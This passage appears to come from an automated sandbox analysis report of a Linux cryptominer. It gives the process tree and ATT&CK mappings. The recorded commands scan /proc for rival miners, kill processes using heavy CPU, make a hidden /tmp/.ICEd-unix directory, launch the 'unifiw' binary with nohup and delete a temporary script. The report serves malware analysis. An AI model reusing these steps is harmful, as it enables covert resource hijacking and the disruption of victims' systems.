  ls -al /proc/19
  2⤵
  PID:1063
- /bin/grep
  grep -a donate-level /proc/19/exe
  2⤵
  PID:1067
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1070
- /bin/grep
  grep exe
  2⤵
  PID:1069
- /bin/ls
  ls -al /proc/19
  2⤵
  PID:1068
- /bin/grep
  grep unifiw
  2⤵
  PID:1072
- /bin/ls
  ls -al /proc/2
  2⤵
  PID:1071
- /bin/grep
  grep -a donate-level /proc/2/exe
  2⤵
  PID:1073
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1076
- /bin/grep
  grep exe
  2⤵
  PID:1075
- /bin/ls
  ls -al /proc/2
  2⤵
  PID:1074
- /bin/grep
  grep unifiw
  2⤵
  PID:1078
- /bin/ls
  ls -al /proc/20
  2⤵
  PID:1077
- /bin/grep
  grep -a donate-level /proc/20/exe
  2⤵
  PID:1079
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1082
- /bin/grep
  grep exe
  2⤵
  PID:1081
- /bin/ls
  ls -al /proc/20
  2⤵
  PID:1080
- /bin/grep
  grep unifiw
  2⤵
  PID:1084
- /bin/ls
  ls -al /proc/21
  2⤵
  PID:1083
- /bin/grep
  grep -a donate-level /proc/21/exe
  2⤵
  PID:1085
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1088
- /bin/grep
  grep exe
  2⤵
  PID:1087
- /bin/ls
  ls -al /proc/21
  2⤵
  PID:1086
- /bin/grep
  grep unifiw
  2⤵
  PID:1090
- /bin/ls
  ls -al /proc/22
  2⤵
  PID:1089
- /bin/grep
  grep -a donate-level /proc/22/exe
  2⤵
  PID:1091
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1094
- /bin/grep
  grep exe
  2⤵
  PID:1093
- /bin/ls
  ls -al /proc/22
  2⤵
  PID:1092
- /bin/grep
  grep unifiw
  2⤵
  PID:1096
- /bin/ls
  ls -al /proc/23
  2⤵
  PID:1095
- /bin/grep
  grep -a donate-level /proc/23/exe
  2⤵
  PID:1097
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1100
- /bin/grep
  grep exe
  2⤵
  PID:1099
- /bin/ls
  ls -al /proc/23
  2⤵
  PID:1098
- /bin/grep
  grep unifiw
  2⤵
  PID:1102
- /bin/ls
  ls -al /proc/238
  2⤵
  PID:1101
- /bin/grep
  grep -a donate-level /proc/238/exe
  2⤵
  PID:1103
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1106
- /bin/grep
  grep exe
  2⤵
  PID:1105
- /bin/ls
  ls -al /proc/238
  2⤵
  PID:1104
- /bin/grep
  grep unifiw
  2⤵
  PID:1108
- /bin/ls
  ls -al /proc/24
  2⤵
  PID:1107
- /bin/grep
  grep -a donate-level /proc/24/exe
  2⤵
  PID:1109
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1112
- /bin/grep
  grep exe
  2⤵
  PID:1111
- /bin/ls
  ls -al /proc/24
  2⤵
  PID:1110
- /bin/grep
  grep unifiw
  2⤵
  PID:1114
- /bin/ls
  ls -al /proc/252
  2⤵
  PID:1113
- /bin/grep
  grep -a donate-level /proc/252/exe
  2⤵
  PID:1115
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1118
- /bin/grep
  grep exe
  2⤵
  PID:1117
- /bin/ls
  ls -al /proc/252
  2⤵
  PID:1116
- /bin/grep
  grep unifiw
  2⤵
  PID:1120
- /bin/ls
  ls -al /proc/3
  2⤵
  PID:1119
- /bin/grep
  grep -a donate-level /proc/3/exe
  2⤵
  PID:1121
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1124
- /bin/grep
  grep exe
  2⤵
  PID:1123
- /bin/ls
  ls -al /proc/3
  2⤵
  PID:1122
- /bin/grep
  grep unifiw
  2⤵
  PID:1126
- /bin/ls
  ls -al /proc/338
  2⤵
  PID:1125
- /bin/grep
  grep -a donate-level /proc/338/exe
  2⤵
  PID:1127
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1130
- /bin/grep
  grep exe
  2⤵
  PID:1129
- /bin/ls
  ls -al /proc/338
  2⤵
  PID:1128
- /bin/grep
  grep unifiw
  2⤵
  PID:1132
- /bin/ls
  ls -al /proc/339
  2⤵
  PID:1131
- /bin/grep
  grep -a donate-level /proc/339/exe
  2⤵
  PID:1133
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1136
- /bin/grep
  grep exe
  2⤵
  PID:1135
- /bin/ls
  ls -al /proc/339
  2⤵
  PID:1134
- /bin/grep
  grep unifiw
  2⤵
  PID:1138
- /bin/ls
  ls -al /proc/340
  2⤵
  PID:1137
- /bin/grep
  grep -a donate-level /proc/340/exe
  2⤵
  PID:1139
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1142
- /bin/grep
  grep exe
  2⤵
  PID:1141
- /bin/ls
  ls -al /proc/340
  2⤵
  PID:1140
- /bin/grep
  grep unifiw
  2⤵
  PID:1144
- /bin/ls
  ls -al /proc/341
  2⤵
  PID:1143
- /bin/grep
  grep -a donate-level /proc/341/exe
  2⤵
  PID:1145
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1148
- /bin/grep
  grep exe
  2⤵
  PID:1147
- /bin/ls
  ls -al /proc/341
  2⤵
  PID:1146
- /bin/grep
  grep unifiw
  2⤵
  PID:1150
- /bin/ls
  ls -al /proc/345
  2⤵
  PID:1149
- /bin/grep
  grep -a donate-level /proc/345/exe
  2⤵
  PID:1151
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1154
- /bin/grep
  grep exe
  2⤵
  PID:1153
- /bin/ls
  ls -al /proc/345
  2⤵
  PID:1152
- /bin/grep
  grep unifiw
  2⤵
  PID:1156
- /bin/ls
  ls -al /proc/36
  2⤵
  PID:1155
- /bin/grep
  grep -a donate-level /proc/36/exe
  2⤵
  PID:1157
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1160
- /bin/grep
  grep exe
  2⤵
  PID:1159
- /bin/ls
  ls -al /proc/36
  2⤵
  PID:1158
- /bin/grep
  grep unifiw
  2⤵
  PID:1162
- /bin/ls
  ls -al /proc/37
  2⤵
  PID:1161
- /bin/grep
  grep -a donate-level /proc/37/exe
  2⤵
  PID:1163
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1166
- /bin/grep
  grep exe
  2⤵
  PID:1165
- /bin/ls
  ls -al /proc/37
  2⤵
  PID:1164
- /bin/grep
  grep unifiw
  2⤵
  PID:1168
- /bin/ls
  ls -al /proc/382
  2⤵
  PID:1167
- /bin/grep
  grep -a donate-level /proc/382/exe
  2⤵
  PID:1169
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1172
- /bin/grep
  grep exe
  2⤵
  PID:1171
- /bin/ls
  ls -al /proc/382
  2⤵
  PID:1170
- /bin/grep
  grep unifiw
  2⤵
  PID:1174
- /bin/ls
  ls -al /proc/383
  2⤵
  PID:1173
- /bin/grep
  grep -a donate-level /proc/383/exe
  2⤵
  PID:1175
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1178
- /bin/grep
  grep exe
  2⤵
  PID:1177
- /bin/ls
  ls -al /proc/383
  2⤵
  PID:1176
- /bin/grep
  grep unifiw
  2⤵
  PID:1180
- /bin/ls
  ls -al /proc/386
  2⤵
  PID:1179
- /bin/grep
  grep -a donate-level /proc/386/exe
  2⤵
  PID:1181
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1184
- /bin/grep
  grep exe
  2⤵
  PID:1183
- /bin/ls
  ls -al /proc/386
  2⤵
  PID:1182
- /bin/grep
  grep unifiw
  2⤵
  PID:1186
- /bin/ls
  ls -al /proc/4
  2⤵
  PID:1185
- /bin/grep
  grep -a donate-level /proc/4/exe
  2⤵
  PID:1187
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1190
- /bin/grep
  grep exe
  2⤵
  PID:1189
- /bin/ls
  ls -al /proc/4
  2⤵
  PID:1188
- /bin/grep
  grep unifiw
  2⤵
  PID:1192
- /bin/ls
  ls -al /proc/437
  2⤵
  PID:1191
- /bin/grep
  grep -a donate-level /proc/437/exe
  2⤵
  PID:1193
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1196
- /bin/grep
  grep exe
  2⤵
  PID:1195
- /bin/ls
  ls -al /proc/437
  2⤵
  PID:1194
- /bin/grep
  grep unifiw
  2⤵
  PID:1198
- /bin/ls
  ls -al /proc/5
  2⤵
  PID:1197
- /bin/grep
  grep -a donate-level /proc/5/exe
  2⤵
  PID:1199
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1202
- /bin/grep
  grep exe
  2⤵
  PID:1201
- /bin/ls
  ls -al /proc/5
  2⤵
  PID:1200
- /bin/grep
  grep unifiw
  2⤵
  PID:1204
- /bin/ls
  ls -al /proc/6
  2⤵
  PID:1203
- /bin/grep
  grep -a donate-level /proc/6/exe
  2⤵
  PID:1205
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1208
- /bin/grep
  grep exe
  2⤵
  PID:1207
- /bin/ls
  ls -al /proc/6
  2⤵
  PID:1206
- /bin/grep
  grep unifiw
  2⤵
  PID:1210
- /bin/ls
  ls -al /proc/669
  2⤵
  PID:1209
- /bin/grep
  grep -a donate-level /proc/669/exe
  2⤵
  PID:1211
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1214
- /bin/grep
  grep exe
  2⤵
  PID:1213
- /bin/ls
  ls -al /proc/669
  2⤵
  PID:1212
- /bin/grep
  grep unifiw
  2⤵
  PID:1216
- /bin/ls
  ls -al /proc/67
  2⤵
  PID:1215
- /bin/grep
  grep -a donate-level /proc/67/exe
  2⤵
  PID:1217
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1220
- /bin/grep
  grep exe
  2⤵
  PID:1219
- /bin/ls
  ls -al /proc/67
  2⤵
  PID:1218
- /bin/grep
  grep unifiw
  2⤵
  PID:1222
- /bin/ls
  ls -al /proc/672
  2⤵
  PID:1221
- /bin/grep
  grep -a donate-level /proc/672/exe
  2⤵
  PID:1223
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1226
- /bin/grep
  grep exe
  2⤵
  PID:1225
- /bin/ls
  ls -al /proc/672
  2⤵
  PID:1224
- /bin/grep
  grep unifiw
  2⤵
  PID:1228
- /bin/ls
  ls -al /proc/675
  2⤵
  PID:1227
- /bin/grep
  grep -a donate-level /proc/675/exe
  2⤵
  PID:1229
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1232
- /bin/grep
  grep exe
  2⤵
  PID:1231
- /bin/ls
  ls -al /proc/675
  2⤵
  PID:1230
- /bin/grep
  grep unifiw
  2⤵
  PID:1234
- /bin/ls
  ls -al /proc/676
  2⤵
  PID:1233
- /bin/grep
  grep -a donate-level /proc/676/exe
  2⤵
  PID:1235
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1238
- /bin/grep
  grep exe
  2⤵
  PID:1237
- /bin/ls
  ls -al /proc/676
  2⤵
  PID:1236
- /bin/grep
  grep unifiw
  2⤵
  PID:1240
- /bin/ls
  ls -al /proc/691
  2⤵
  PID:1239
- /bin/grep
  grep -a donate-level /proc/691/exe
  2⤵
  PID:1241
- /bin/grep
  grep exe
  2⤵
  PID:1243
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1244
- /bin/ls
  ls -al /proc/691
  2⤵
  PID:1242
- /bin/grep
  grep unifiw
  2⤵
  PID:1246
- /bin/ls
  ls -al /proc/7
  2⤵
  - Reads runtime system information
  PID:1245
- /bin/grep
  grep -a donate-level /proc/7/exe
  2⤵
  PID:1247
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1250
- /bin/grep
  grep exe
  2⤵
  PID:1249
- /bin/ls
  ls -al /proc/7
  2⤵
  PID:1248
- /bin/grep
  grep unifiw
  2⤵
  PID:1252
- /bin/ls
  ls -al /proc/707
  2⤵
  PID:1251
- /bin/grep
  grep -a donate-level /proc/707/exe
  2⤵
  PID:1253
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1256
- /bin/grep
  grep exe
  2⤵
  PID:1255
- /bin/ls
  ls -al /proc/707
  2⤵
  PID:1254
- /bin/grep
  grep unifiw
  2⤵
  PID:1258
- /bin/ls
  ls -al /proc/71
  2⤵
  PID:1257
- /bin/grep
  grep -a donate-level /proc/71/exe
  2⤵
  PID:1259
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1262
- /bin/grep
  grep exe
  2⤵
  PID:1261
- /bin/ls
  ls -al /proc/71
  2⤵
  PID:1260
- /bin/grep
  grep unifiw
  2⤵
  PID:1264
- /bin/ls
  ls -al /proc/710
  2⤵
  PID:1263
- /bin/grep
  grep -a donate-level /proc/710/exe
  2⤵
  PID:1265
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1268
- /bin/grep
  grep exe
  2⤵
  PID:1267
- /bin/ls
  ls -al /proc/710
  2⤵
  PID:1266
- /bin/grep
  grep unifiw
  2⤵
  PID:1270
- /bin/ls
  ls -al /proc/711
  2⤵
  PID:1269
- /bin/grep
  grep -a donate-level /proc/711/exe
  2⤵
  PID:1271
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1274
- /bin/grep
  grep exe
  2⤵
  PID:1273
- /bin/ls
  ls -al /proc/711
  2⤵
  PID:1272
- /bin/grep
  grep unifiw
  2⤵
  PID:1276
- /bin/ls
  ls -al /proc/718
  2⤵
  PID:1275
- /bin/grep
  grep -a donate-level /proc/718/exe
  2⤵
  PID:1277
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1280
- /bin/grep
  grep exe
  2⤵
  PID:1279
- /bin/ls
  ls -al /proc/718
  2⤵
  PID:1278
- /bin/grep
  grep unifiw
  2⤵
  PID:1282
- /bin/ls
  ls -al /proc/72
  2⤵
  PID:1281
- /bin/grep
  grep -a donate-level /proc/72/exe
  2⤵
  PID:1283
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1286
- /bin/grep
  grep exe
  2⤵
  PID:1285
- /bin/ls
  ls -al /proc/72
  2⤵
  PID:1284
- /bin/grep
  grep unifiw
  2⤵
  PID:1288
- /bin/ls
  ls -al /proc/727
  2⤵
  PID:1287
- /bin/grep
  grep -a donate-level /proc/727/exe
  2⤵
  PID:1289
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1292
- /bin/grep
  grep exe
  2⤵
  PID:1291
- /bin/ls
  ls -al /proc/727
  2⤵
  PID:1290
- /bin/ls
  ls -al /proc/73
  2⤵
  PID:1295
- /bin/grep
  grep unifiw
  2⤵
  PID:1296
- /bin/grep
  grep -a donate-level /proc/73/exe
  2⤵
  PID:1300
- /bin/grep
  grep exe
  2⤵
  PID:1302
- /bin/ls
  ls -al /proc/73
  2⤵
  PID:1301
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1303
- /bin/grep
  grep unifiw
  2⤵
  PID:1305
- /bin/ls
  ls -al /proc/74
  2⤵
  PID:1304
- /bin/grep
  grep -a donate-level /proc/74/exe
  2⤵
  PID:1306
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1309
- /bin/grep
  grep exe
  2⤵
  PID:1308
- /bin/ls
  ls -al /proc/74
  2⤵
  PID:1307
- /bin/grep
  grep unifiw
  2⤵
  PID:1311
- /bin/ls
  ls -al /proc/75
  2⤵
  PID:1310
- /bin/grep
  grep -a donate-level /proc/75/exe
  2⤵
  PID:1313
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1316
- /bin/grep
  grep exe
  2⤵
  PID:1315
- /bin/ls
  ls -al /proc/75
  2⤵
  PID:1314
- /bin/grep
  grep unifiw
  2⤵
  PID:1318
- /bin/ls
  ls -al /proc/76
  2⤵
  PID:1317
- /bin/grep
  grep -a donate-level /proc/76/exe
  2⤵
  PID:1319
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1322
- /bin/grep
  grep exe
  2⤵
  PID:1321
- /bin/ls
  ls -al /proc/76
  2⤵
  PID:1320
- /bin/grep
  grep unifiw
  2⤵
  PID:1325
- /bin/ls
  ls -al /proc/77
  2⤵
  PID:1324
- /bin/grep
  grep -a donate-level /proc/77/exe
  2⤵
  PID:1326
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1329
- /bin/grep
  grep exe
  2⤵
  PID:1328
- /bin/ls
  ls -al /proc/77
  2⤵
  PID:1327
- /bin/grep
  grep unifiw
  2⤵
  PID:1331
- /bin/ls
  ls -al /proc/79
  2⤵
  PID:1330
- /bin/grep
  grep -a donate-level /proc/79/exe
  2⤵
  PID:1333
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1336
- /bin/grep
  grep exe
  2⤵
  PID:1335
- /bin/ls
  ls -al /proc/79
  2⤵
  PID:1334
- /bin/grep
  grep unifiw
  2⤵
  PID:1338
- /bin/ls
  ls -al /proc/8
  2⤵
  PID:1337
- /bin/grep
  grep -a donate-level /proc/8/exe
  2⤵
  PID:1339
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1342
- /bin/grep
  grep exe
  2⤵
  PID:1341
- /bin/ls
  ls -al /proc/8
  2⤵
  PID:1340
- /bin/grep
  grep unifiw
  2⤵
  PID:1344
- /bin/ls
  ls -al /proc/81
  2⤵
  PID:1343
- /bin/grep
  grep -a donate-level /proc/81/exe
  2⤵
  PID:1345
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1348
- /bin/grep
  grep exe
  2⤵
  PID:1347
- /bin/ls
  ls -al /proc/81
  2⤵
  PID:1346
- /bin/grep
  grep unifiw
  2⤵
  PID:1350
- /bin/ls
  ls -al /proc/83
  2⤵
  PID:1349
- /bin/grep
  grep -a donate-level /proc/83/exe
  2⤵
  PID:1351
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1354
- /bin/grep
  grep exe
  2⤵
  PID:1353
- /bin/ls
  ls -al /proc/83
  2⤵
  PID:1352
- /bin/grep
  grep unifiw
  2⤵
  PID:1356
- /bin/ls
  ls -al /proc/857
  2⤵
  PID:1355
- /bin/grep
  grep -a donate-level /proc/857/exe
  2⤵
  PID:1357
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1360
- /bin/grep
  grep exe
  2⤵
  PID:1359
- /bin/ls
  ls -al /proc/857
  2⤵
  PID:1358
- /bin/grep
  grep unifiw
  2⤵
  PID:1362
- /bin/ls
  ls -al /proc/867
  2⤵
  PID:1361
- /bin/grep
  grep -a donate-level /proc/867/exe
  2⤵
  PID:1363
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1366
- /bin/grep
  grep exe
  2⤵
  PID:1365
- /bin/ls
  ls -al /proc/867
  2⤵
  PID:1364
- /bin/grep
  grep unifiw
  2⤵
  PID:1368
- /bin/ls
  ls -al /proc/881
  2⤵
  PID:1367
- /bin/grep
  grep -a donate-level /proc/881/exe
  2⤵
  PID:1369
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1372
- /bin/grep
  grep exe
  2⤵
  PID:1371
- /bin/ls
  ls -al /proc/881
  2⤵
  PID:1370
- /bin/grep
  grep unifiw
  2⤵
  PID:1374
- /bin/ls
  ls -al /proc/9
  2⤵
  PID:1373
- /bin/grep
  grep -a donate-level /proc/9/exe
  2⤵
  PID:1375
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1378
- /bin/grep
  grep exe
  2⤵
  PID:1377
- /bin/ls
  ls -al /proc/9
  2⤵
  PID:1376
- /bin/grep
  grep unifiw
  2⤵
  PID:1380
- /bin/ls
  ls -al /proc/936
  2⤵
  PID:1379
- /bin/grep
  grep -a donate-level /proc/936/exe
  2⤵
  PID:1381
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1384
- /bin/grep
  grep exe
  2⤵
  PID:1383
- /bin/ls
  ls -al /proc/936
  2⤵
  PID:1382
- /bin/grep
  grep unifiw
  2⤵
  PID:1386
- /bin/ls
  ls -al /proc/937
  2⤵
  PID:1385
- /bin/grep
  grep -a donate-level /proc/937/exe
  2⤵
  PID:1387
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1390
- /bin/grep
  grep exe
  2⤵
  PID:1389
- /bin/ls
  ls -al /proc/937
  2⤵
  PID:1388
- /bin/grep
  grep unifiw
  2⤵
  PID:1392
- /bin/ls
  ls -al /proc/938
  2⤵
  PID:1391
- /bin/grep
  grep -a donate-level /proc/938/exe
  2⤵
  PID:1393
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1396
- /bin/grep
  grep exe
  2⤵
  PID:1395
- /bin/ls
  ls -al /proc/938
  2⤵
  PID:1394
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:1400
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:1401
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:1401
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:1401
- - /usr/bin/kill
    kill -9
    3⤵
    PID:1401
- - /sbin/kill
    kill -9
    3⤵
    PID:1401
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:1401
- /usr/bin/awk
  awk "{if(\$3>=70.0) print \$2}"
  2⤵
  PID:1399
- /bin/grep
  grep -v grep
  2⤵
  PID:1398
- /bin/ps
  ps auxf
  2⤵
  PID:1397
- /usr/bin/pkill
  pkill -f /tmp/.solr
  2⤵
  - Reads CPU attributes
  PID:1402
- /bin/mkdir
  mkdir /tmp/.ICEd-unix
  2⤵
  PID:1403
- /bin/chmod
  chmod +xwr /tmp/.ICEd-unix
  2⤵
  PID:1408
- /bin/chmod
  chmod +xwr "/tmp/.ICEd-unix/*"
  2⤵
  PID:1409
- /bin/chmod
  chmod +x /tmp/.ICEd-unix/unifiw
  2⤵
  PID:1410
- /bin/chmod
  chmod -w /tmp/.ICEd-unix
  2⤵
  PID:1413
- /usr/bin/nohup
  nohup bash "��Dg�6"
  2⤵
  PID:1412
- /usr/bin/nohup
  nohup /tmp/.ICEd-unix/unifiw
  2⤵
  PID:1411
- /usr/local/sbin/bash
  bash "��Dg�6"
  2⤵
  PID:1412
- /usr/local/bin/bash
  bash "��Dg�6"
  2⤵
  PID:1412
- /usr/sbin/bash
  bash "��Dg�6"
  2⤵
  PID:1412
- /usr/bin/bash
  bash "��Dg�6"
  2⤵
  PID:1412
- /sbin/bash
  bash "��Dg�6"
  2⤵
  PID:1412
- /bin/bash
  bash "��Dg�6"
  2⤵
  PID:1412
- /tmp/.ICEd-unix/unifiw
  /tmp/.ICEd-unix/unifiw
  2⤵
  PID:1411
- /bin/sleep
  sleep 5
  2⤵
  PID:1414
- /bin/rm
  rm -f "/tmp/��Dg�6"
  2⤵
  PID:1415

/bin/grep
grep -v grep
1⤵
PID:933

/bin/ps
ps auxf
1⤵
- Reads runtime system information
PID:932

/bin/grep
grep unifiw
1⤵
PID:934

/usr/bin/awk
awk "{if(\$3>=50.0) print \$2}"
1⤵
PID:935

/bin/ls
ls /proc
1⤵
PID:937

/bin/grep
grep "[0-9]"
1⤵
PID:938

/usr/bin/tr
tr -cd "[:alnum:]"
1⤵
PID:1406

/usr/bin/cut
cut -c -6
1⤵
PID:1407

/usr/bin/head
head -3 /dev/urandom
1⤵
PID:1405

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/spool/cron/crontabs/tmp.TZ2Iwu

Filesize
388B

MD5
9d6d02523b64149c9d15e2c55c1cbe18

SHA1
895cd621485c7898dbcd312eb3cf7d2ef328a506

SHA256
80b5681a749fb49e1d3be5eaeca3cc4be3744c7bf174b254c2f1bf8706f2018f

SHA512
add084eef31b9da9c167c53463ec2dad8c91955c7e92a394f7b2627a2d2183a07310327fdc7f94afb477112a6da1f0b8967f765134a8f765911ed0721b852f62

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

